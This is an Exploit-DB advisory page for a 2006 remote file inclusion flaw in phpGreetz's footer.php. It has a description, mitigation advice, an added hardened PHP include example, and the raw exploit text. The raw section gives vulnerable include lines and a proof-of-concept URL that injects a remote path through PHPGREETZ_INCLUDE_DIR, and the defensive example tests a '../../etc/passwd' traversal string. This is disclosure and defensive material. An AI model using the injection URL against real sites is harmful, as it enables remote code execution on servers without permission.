Vendor: phpGreetz
By: mozi2weed@yahoo.com mozi
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: phpGreetz
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpGreetz Remote File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'PHPGREETZ_INCLUDE_DIR' parameter to the 'footer.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
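
A hardened form of the include pattern quoted in the advisory on this page, as an added example that is not phpGreetz's own code or its patch. The names `INCLUDE_BASE`, `ALLOWED_LANGS` and `resolve_lang_file`, and the language codes, are assumptions made for illustration.

```php
<?php
// Added example, not phpGreetz code or its patch. Requires PHP 7.1+.
// Pattern quoted in the advisory on this page:
//   include("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
// The page reports that PHPGREETZ_INCLUDE_DIR can arrive as a request parameter.

// Fix 1: the include base is a constant set in code, never request data.
define('INCLUDE_BASE', __DIR__);            // hypothetical constant name
// Fix 2: the language code must match an allowlist (assumed values).
const ALLOWED_LANGS = ['en', 'de', 'fr'];

// Return the absolute path of an allowlisted language file under $base,
// or null if the code is not allowlisted or the path leaves $base/language.
function resolve_lang_file(string $base, string $lang): ?string
{
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        return null;                        // rejects URLs, "../", anything unlisted
    }
    $root = realpath($base . '/language');
    $path = realpath($base . '/language/lang.' . $lang . '.inc.php');
    if ($root === false || $path === false) {
        return null;                        // directory or file does not exist
    }
    // Containment check on the resolved (symlink-free) path.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Self-check with constructed inputs: build a throwaway tree, then resolve.
$base = sys_get_temp_dir() . '/greetz_demo_' . getmypid();
@mkdir($base . '/language', 0700, true);
file_put_contents($base . '/language/lang.en.inc.php', "<?php // constructed sample\n");
foreach (['en', 'de', '../../etc/passwd', 'http://example.invalid/x'] as $input) {
    $file = resolve_lang_file($base, $input);
    printf("%-26s => %s\n", $input, $file === null ? 'rejected' : 'include ' . basename($file));
}
unlink($base . '/language/lang.en.inc.php');
rmdir($base . '/language');
rmdir($base);

// In the template itself the call would be:
//   $file = resolve_lang_file(INCLUDE_BASE, $session_lang)
//        ?? resolve_lang_file(INCLUDE_BASE, 'en');
//   if ($file !== null) { include $file; }
```

Keeping `allow_url_include` off in php.ini (the PHP default) additionally stops `include` from fetching remote URLs even if a path check is missed.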
Source

Exploit-DB raw data:

# Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com
 
#phpfreaks again
# heh tnx

# milw0rm.com [2006-10-04]